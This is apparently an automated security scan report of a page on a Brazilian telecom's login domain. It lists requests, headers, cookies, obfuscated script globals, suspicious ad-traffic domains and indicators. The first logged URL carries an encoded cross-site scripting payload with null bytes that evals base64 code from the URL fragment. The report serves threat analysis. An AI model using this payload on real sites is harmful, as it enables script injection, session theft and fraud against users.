https://www.google-analytics.com/j/collect?v=1&_v=j101&a=1117440505&t=pageview&_s=1&dl=http%3A%2F%2Fauth3.tim.com.br%2Fv3%2Faccesscontrol-web%2Fheloading%3Fbmctx%3DD1C237A58FCD95265CB8D6ACE4AD377F2DE982FD5328553125A1F2A984F4091ACB28FCD2C93EFA64F67EC7905B8B708C%26contextType%3Dexternal%26username%3Dstring%26enablePersistentLogin%3Dtrue%26password%3Dsecure_string%26challenge_url%3Dhttp%253A%252F%252Fauth3.tim.com.br%252Fv3%252Faccesscontrol-web%252Fheloading%26request_id%3D8407358969913691941%26authn_try_count%3D0%26locale%3Duk_UA%26resource_url%3Dhttps%25253A%25252F%25252Fauth3.tim.com.br%25252Fv3%25252Faccesscontrol-web%25252Fhe%25253Fclient_id%25253Db4da3e0624b94cbabb4d4c82b84b3012%252526csp%25253D751%252526appid%25253D11657%252526msisdn%25253D16982527516%252526redirect_uri%25253Dhttp%252525253A%252525252F%252525252Fwww.timpromos.com.br%252525252FNCN%252525252Fcallback%252525252Fpending%252526SecureSessionId%25253DAQ4z3kkKCibe9oqqd_5osqMKaYkmfLQn0SBDpKMj_k8SHvaQO11enrYcmhdBDWgLEgjG%252526campaignReturnURL%25253Dhttp%252525253A%252525252F%252525252Fwww.timpromos.com.br%252522%25253E%2500%2500%2500%2500%2500%2500%2500%25253CScript%25253Eeval(atob(window.location.hash.substr(1)))%25253C%25252FScript%25253E%252525252FNCN%252525252Fredirect%252526paymentType%25253D2&ul=en-us&de=windows-1252&sd=24-bit&sr=1600x1200&vp=1600x1200&je=0&_u=YCDAgEABAAAAACAAI~&jid=573657877&gjid=293724572&cid=1378330578.1706492976&tid=UA-145115646-69&_gid=1295298900.1706492976&_slc=1&gtm=45He41o0n81MBV8MJ7v856739148&gcd=11l1l1l1l1&dma=0&z=890210912
Requested by
Host: www.google-analytics.com
URL: https://www.google-analytics.com/analytics.js
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
2607:f8b0:4004:c1b::71 Washington, United States, ASN15169 (GOOGLE, US),
Reverse DNS
Software
Golfe2 /
Resource Hash
1cffc2b3146584685cd72751d7f28aa030ab9ae2f1bc78f2c27909f8d8287b26
Security Headers
Name Value
X-Content-Type-Options nosniff

Request headers

Referer
accept-language
en-US,en;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Safari/537.36
Content-Type
text/plain

Response headers

pragma
no-cache
date
Mon, 29 Jan 2024 01:49:36 GMT
x-content-type-options
nosniff
last-modified
Sun, 17 May 1998 03:00:00 GMT
server
Golfe2
content-type
text/plain
access-control-allow-origin
http://auth3.tim.com.br
cache-control
no-cache, no-store, must-revalidate
access-control-allow-credentials
true
cross-origin-resource-policy
cross-origin
alt-svc
h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
content-length
3
expires
Fri, 01 Jan 1990 00:00:00 GMT
collect
stats.g.doubleclick.net/j/ 		2 B
149 B 		XHR
General
Check archive.org
Download Go to
Full URL
https://stats.g.doubleclick.net/j/collect?t=dc&aip=1&_r=3&v=1&_v=j101&tid=UA-145115646-69&cid=1378330578.1706492976&jid=573657877&gjid=293724572&_gid=1295298900.1706492976&_u=YCDAgEABAAAAAGAAI~&z=2061591954
Requested by
Host: www.google-analytics.com
URL: https://www.google-analytics.com/analytics.js
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
2607:f8b0:4004:c08::9d Ashburn, United States, ASN15169 (GOOGLE, US),
Reverse DNS
Software
Golfe2 /
Resource Hash
6068f86ff5e6d3a3e100e95fd0ab03a5fb9ebfca9386b2c0ee131361a62526c2
Security Headers
Name Value
Strict-Transport-Security max-age=10886400; includeSubDomains; preload
X-Content-Type-Options nosniff

Request headers

Referer
accept-language
en-US,en;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Safari/537.36
Content-Type
text/plain

Response headers

pragma
no-cache
strict-transport-security
max-age=10886400; includeSubDomains; preload
date
Mon, 29 Jan 2024 01:49:36 GMT
x-content-type-options
nosniff
last-modified
Sun, 17 May 1998 03:00:00 GMT
server
Golfe2
content-type
text/plain
access-control-allow-origin
http://auth3.tim.com.br
cache-control
no-cache, no-store, must-revalidate
access-control-allow-credentials
true
cross-origin-resource-policy
cross-origin
alt-svc
h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
content-length
2
expires
Fri, 01 Jan 1990 00:00:00 GMT
ga-audiences
www.google.com/ads/ 		42 B
408 B 		Image
General
Check archive.org
Download Go to Show image
Full URL
https://www.google.com/ads/ga-audiences?t=sr&aip=1&_r=4&slf_rd=1&v=1&_v=j101&tid=UA-145115646-69&cid=1378330578.1706492976&jid=573657877&_u=YCDAgEABAAAAAGAAI~&z=1082330199
Protocol
H2
Security
TLS 1.3, , AES_128_GCM
Server
2607:f8b0:4004:c09::6a -, , ASN (),
Reverse DNS
Software
cafe /
Resource Hash
ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
Security Headers
Name Value
X-Content-Type-Options nosniff
X-Xss-Protection 0

Request headers

accept-language
en-US,en;q=0.9
Referer
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.224 Safari/537.36

Response headers

pragma
no-cache
date
Mon, 29 Jan 2024 01:49:36 GMT
x-content-type-options
nosniff
server
cafe
content-type
image/gif
p3p
policyref="https://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"
cache-control
no-cache, no-store, must-revalidate
cross-origin-resource-policy
cross-origin
timing-allow-origin
*
alt-svc
h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
content-length
42
x-xss-protection
0
expires
Fri, 01 Jan 1990 00:00:00 GMT

Failed requests

These URLs were requested, but there was no response received. You will also see them in the list above.

Domain
wap.dindo.com.br
URL
https://wap.dindo.com.br/newMobile/auth/tim/cns.css
Domain
wap.dindo.com.br
URL
https://wap.dindo.com.br/newMobile/auth/tim/header.aspx?s=25

Verdicts & Comments Add Verdict or Comment

29 JavaScript Global Variables

These are the non-standard "global" variables defined on the window object. These can be helpful in identifying possible client-side frameworks and code.

object| 0 object| dataLayer function| $ function| jQuery object| bowser function| logClient object| s string| idClick string| link function| _0xb311 function| _0x4596 function| _0x4ac69e function| rand string| fill object| _0x36b3 function| _0x5121 string| CURRENT_APP_URL string| AJAX_EVENT_ENDPOINT function| secureDMsisdnValidationFn function| prefillValues function| countryCode object| google_tag_manager object| google_tag_data string| GoogleAnalyticsObject function| ga function| onYouTubeIframeAPIReady object| gaGlobal object| gaplugins object| gaData

10 Cookies

Domain/Path Name / Value
topadvisitpro.pro/lion Name: sess_61f7f24dfebf565dbf7a1cac
Value: 6116747aed2d2c6e4b513e2f
topadvisitpro.pro/lion Name: __cf_bm
Value: e_znFmikTkbIpQizob29EUey_YiwwgRhUX8TksJUvvM-1706492970-1-AeNwx%2Bl70c56plsSNERqvLfe64acOJPx8ycvYxEOAE%2BimkoW7pKJPOh0khb1oM6VMezqPAh1r3vvQlXtYOu2J%2B8
auth3.tim.com.br/ Name: JSESSIONID
Value: -3pS6EoS4NRPNkigL47URTPhtj-tlm9ITUl1xf7iW-mZAtXuTZaK!1086270961
.tim.com.br/ Name: visid_incap_2787765
Value: JweIEgVNSGyWLOqDXMN/+SwEt2UAAAAAQUIPAAAAAADtLET1hWZmJMjswvz76kIu
.tim.com.br/ Name: incap_ses_168_2787765
Value: APBGeiDzvFACb8SXF9xUAiwEt2UAAAAAYbgBDre8mvU9hkd+hRNVrA==
.tim.com.br/ Name: _gcl_au
Value: 1.1.800098938.1706492976
.tim.com.br/ Name: _ga_9LLK8PEDTW
Value: GS1.1.1706492976.1.1.1706492976.60.0.0
.tim.com.br/ Name: _ga
Value: GA1.3.1378330578.1706492976
.tim.com.br/ Name: _gid
Value: GA1.3.1295298900.1706492976
.tim.com.br/ Name: _dc_gtm_UA-145115646-69
Value: 1

5 Console Messages

Source Level URL
Text
network error URL: https://wap.dindo.com.br/newMobile/auth/tim/cns.css
Message:
Failed to load resource: net::ERR_NAME_NOT_RESOLVED
network error URL: https://www.googletagmanager.com/gtm.js?id=GTM-XXXX
Message:
Failed to load resource: the server responded with a status of 404 ()
security warning URL: http://premtraf.pro/lion/222gdhj/temp.js
Message:
An iframe which has both allow-scripts and allow-same-origin for its sandbox attribute can escape its sandboxing.
network error URL: https://auth3.tim.com.br/v3/accesscontrol-web/assets/OTA-BRTIM-BEMOBKIDS-timgameskids2-pt-doi-web.css?ver=45
Message:
Failed to load resource: the server responded with a status of 404 ()
network error URL: https://auth3.tim.com.br/v3/accesscontrol-web/assets/images/Bemobi/OTA-timgameskids2-logoHeader.png
Message:
Failed to load resource: the server responded with a status of 404 ()

Indicators

This is a term in the security industry to describe indicators such as IPs, Domains, Hashes, etc. This does not imply that any of these indicate malicious activity.

analytics-br-tim.securewebfraud.io
analytics.google.com
auth3.tim.com.br
premtraf.pro
stats.g.doubleclick.net
topadvisitpro.pro
wap.dindo.com.br
www.google-analytics.com
www.google.com
www.googletagmanager.com
www.timpromos.com.br
wap.dindo.com.br
2001:4860:4802:38::181
2607:f8b0:4004:c08::9d
2607:f8b0:4004:c09::6a
2607:f8b0:4004:c1b::61
2607:f8b0:4004:c1b::71
45.60.63.22
45.90.56.13
91.220.208.18
91.241.94.8
1cffc2b3146584685cd72751d7f28aa030ab9ae2f1bc78f2c27909f8d8287b26
38b82be8dc970bd32e5651b51b46d5c5bdd81a1766c035bbe022f1d00ac09fce
3e75a6774ef7041083d556b2f83a816acdd398eff6add8c1867c0cea9ddf6d4b
5e64cc7782eeab8004d02bda9f320b268f12975560e5d85a6ab4bec78c6d5347
6068f86ff5e6d3a3e100e95fd0ab03a5fb9ebfca9386b2c0ee131361a62526c2
646de1820a3f0a81b2aa7ea26de561e5cbab36ef8430d7bb7b7f0ab024569b40
668b046d12db350ccba6728890476b3efee53b2f42dbb84743e5e9f1ae0cc404
71928367deed25916c0de98665f5733b47e07ae048a79a0901a48fabb9876040
7455bacb03f7ef04d79010638db14d8434cf7a349914c2ee99eb5d4220338675
aac2555412640904188450d33284dffe719157d0d317f5158f22de66054883f3
b3f86ed7a79081c9ceb28c435903bc6737f73331c7462759baab9640bd802acd
c28f024df8df9c3553efca35b134d3bde558f9e5f85a3b052d581bef81c47c90
d4e646539ef3bbac4e505327d7e625b4c4439997a0bc84a08989d8a3a41dedb4
d8151845717c3ed76a8002136f43423e7efedc096b4f60eb7aefe62c65544eef
dac0e0a27027392c4c5754b40e9df0b62627319dbab1bb3ee2aa1e72ddcf5c62
de36e50194320a7d3ef1ace9bd34a875a8bd458b253c061979dd628e9bf49afd
e0ef803f8bb9cbe07f2407212c2422f87d48dbd08addb5bb994c5f485b2dcc6a
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
f05e67abbb4c8036ae631ee4fc5a99428d5bad75fd8996dfb01c09ec6ade3a1b